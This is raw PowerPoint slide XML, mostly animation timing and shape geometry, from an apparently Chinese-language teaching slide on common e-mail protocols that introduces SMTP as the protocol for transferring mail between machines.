                                          <p:spTgt spid="58383"/>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58370"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58370"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.3"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58370"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58370"/>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58381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58381"/>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58384"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58384"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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58377"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58377"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58377"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58377"/>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58379"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58379"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58379"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58379"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="58385"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58385"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="58378"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58378"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58378"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58378"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="70" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="58380"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58380"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58380"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58380"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="50" presetClass="entr" presetSubtype="0" decel="100000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="58376"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58376"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.3"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58376"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58376"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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58390"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5839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58389"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58389"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="87" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="88" presetID="12" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="58374" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="58375" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="58376" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="58379" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="58380" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="58389" grpId="0" animBg="1"/>
      <p:bldP spid="58390" grpId="0" animBg="1"/>
    </p:bld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BAC6EE02-C4A3-4485-B2E4-C2CCF91EF3DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>常见电子邮件协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Freeform 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1385888"/>
            <a:ext cx="7777162" cy="550862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 92711 h 550192"/>
              <a:gd name="T2" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T3" fmla="*/ 27156 h 550192"/>
              <a:gd name="T4" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T5" fmla="*/ 0 h 550192"/>
              <a:gd name="T6" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T7" fmla="*/ 0 h 550192"/>
              <a:gd name="T8" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T9" fmla="*/ 27156 h 550192"/>
              <a:gd name="T10" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T11" fmla="*/ 92711 h 550192"/>
              <a:gd name="T12" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T13" fmla="*/ 463540 h 550192"/>
              <a:gd name="T14" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T15" fmla="*/ 529097 h 550192"/>
              <a:gd name="T16" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T17" fmla="*/ 556252 h 550192"/>
              <a:gd name="T18" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T19" fmla="*/ 556252 h 550192"/>
              <a:gd name="T20" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T21" fmla="*/ 529097 h 550192"/>
              <a:gd name="T22" fmla="*/ 0 w 7776864"/>
              <a:gd name="T23" fmla="*/ 463540 h 550192"/>
              <a:gd name="T24" fmla="*/ 0 w 7776864"/>
              <a:gd name="T25" fmla="*/ 92711 h 550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6864"/>
              <a:gd name="T40" fmla="*/ 0 h 550192"/>
              <a:gd name="T41" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T42" fmla="*/ 550192 h 550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6864" h="550192">
                <a:moveTo>
                  <a:pt x="0" y="91701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67380"/>
                  <a:pt x="9661" y="44056"/>
                  <a:pt x="26859" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44056" y="9662"/>
                  <a:pt x="67381" y="0"/>
                  <a:pt x="91701" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7685163" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7709484" y="0"/>
                  <a:pt x="7732808" y="9661"/>
                  <a:pt x="7750005" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7767202" y="44056"/>
                  <a:pt x="7776864" y="67381"/>
                  <a:pt x="7776864" y="91701"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7776864" y="458491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7776864" y="482812"/>
                  <a:pt x="7767203" y="506136"/>
                  <a:pt x="7750005" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7732808" y="540530"/>
                  <a:pt x="7709483" y="550192"/>
                  <a:pt x="7685163" y="550192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91701" y="550192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67380" y="550192"/>
                  <a:pt x="44056" y="540531"/>
                  <a:pt x="26859" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9662" y="506136"/>
                  <a:pt x="0" y="482811"/>
                  <a:pt x="0" y="458491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91701"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99248" tIns="99248" rIns="99248" bIns="9924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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（简单邮件传输协议）</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59396" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1936750"/>
            <a:ext cx="7777162" cy="323850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 0 h 324472"/>
              <a:gd name="T2" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T3" fmla="*/ 0 h 324472"/>
              <a:gd name="T4" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T5" fmla="*/ 318916 h 324472"/>
              <a:gd name="T6" fmla="*/ 0 w 7776864"/>
              <a:gd name="T7" fmla="*/ 318916 h 324472"/>
              <a:gd name="T8" fmla="*/ 0 w 7776864"/>
              <a:gd name="T9" fmla="*/ 0 h 324472"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7776864"/>
              <a:gd name="T16" fmla="*/ 0 h 324472"/>
              <a:gd name="T17" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T18" fmla="*/ 324472 h 324472"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7776864" h="324472">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7776864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7776864" y="324472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="324472"/>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6915" tIns="24130" rIns="135128" bIns="2413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14300" indent="-1143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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>主要负责底层的邮件系统如何将邮件从一台机器传至另外一台机器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59397" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2260600"/>
            <a:ext cx="7777162" cy="550863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 92713 h 550192"/>
              <a:gd name="T2" fmla="*/ 26868 w 7776864"/>
              <a:gd name="T3" fmla="*/ 27156 h 550192"/>
              <a:gd name="T4" fmla="*/ 91737 w 7776864"/>
              <a:gd name="T5" fmla="*/ 0 h 550192"/>
              <a:gd name="T6" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T7" fmla="*/ 0 h 550192"/>
              <a:gd name="T8" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T9" fmla="*/ 27156 h 550192"/>
              <a:gd name="T10" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T11" fmla="*/ 92713 h 550192"/>
              <a:gd name="T12" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T13" fmla="*/ 463547 h 550192"/>
              <a:gd name="T14" fmla="*/ 7752670 w 7776864"/>
              <a:gd name="T15" fmla="*/ 529105 h 550192"/>
              <a:gd name="T16" fmla="*/ 7687798 w 7776864"/>
              <a:gd name="T17" fmla="*/ 556261 h 550192"/>
